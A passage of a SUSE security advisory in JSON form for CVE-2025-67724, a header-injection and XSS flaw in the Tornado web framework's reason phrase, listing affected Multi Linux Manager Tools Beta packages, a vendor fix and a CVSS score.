"text": "https://www.suse.com/security/cve/CVE-2025-67724"
}
],
"notes": [
{
"category": "general",
"text": "Tornado is a Python web framework and asynchronous networking library. In versions 6.5.2 and below, the supplied reason phrase is used unescaped in HTTP headers (where it could be used for header injection) or in HTML in the default error page (where it could be used for XSS) and can be exploited by passing untrusted or malicious data into the reason argument. Used by both RequestHandler.set_status and tornado.web.HTTPError, the argument is designed to allow applications to pass custom \"reason\" phrases (the \"Not Found\" in HTTP/1.1 404 Not Found) to the HTTP status line (mainly for non-standard status codes). This issue is fixed in version 6.5.3.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Multi Linux Manager Tools Beta SLE-15:dracut-saltboot-1.1.0-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:dracut-wireless-0.1.1595937550.0285244-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgr-push-5.2.3-159000.2.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-bash-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-lang-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-zsh-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-defusedxml-0.7.1-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-mgr-push-5.2.3-159000.2.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-rhnlib-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-spacewalk-client-tools-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:spacecmd-5.2.6-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:spacewalk-client-tools-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:supportutils-plugin-salt-1.2.3-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:supportutils-plugin-susemanager-client-5.2.2-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:dracut-saltboot-1.1.0-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:dracut-wireless-0.1.1595937550.0285244-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-bash-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-lang-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-zsh-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-67724",
"url": "https://www.suse.com/security/cve/CVE-2025-67724"
},
{
"category": "external",
"summary": "SUSE Bug 1254903 for CVE-2025-67724",
"url": "https://bugzilla.suse.com/1254903"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Multi Linux Manager Tools Beta SLE-15:dracut-saltboot-1.1.0-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:dracut-wireless-0.1.1595937550.0285244-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgr-push-5.2.3-159000.2.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-bash-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-lang-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-zsh-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-defusedxml-0.7.1-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-mgr-push-5.2.3-159000.2.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-rhnlib-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-spacewalk-client-tools-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:spacecmd-5.2.6-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:spacewalk-client-tools-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:supportutils-plugin-salt-1.2.3-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:supportutils-plugin-susemanager-client-5.2.2-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:dracut-saltboot-1.1.0-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:dracut-wireless-0.1.1595937550.0285244-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-bash-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-lang-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-zsh-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"SUSE Multi Linux Manager Tools Beta SLE-15:dracut-saltboot-1.1.0-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:dracut-wireless-0.1.1595937550.0285244-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgr-push-5.2.3-159000.2.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-bash-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-lang-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-zsh-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-defusedxml-0.7.1-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-mgr-push-5.2.3-159000.2.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-rhnlib-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-spacewalk-client-tools-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:spacecmd-5.2.6-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:spacewalk-client-tools-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:supportutils-plugin-salt-1.2.3-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:supportutils-plugin-susemanager-client-5.2.2-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.ppc64le",
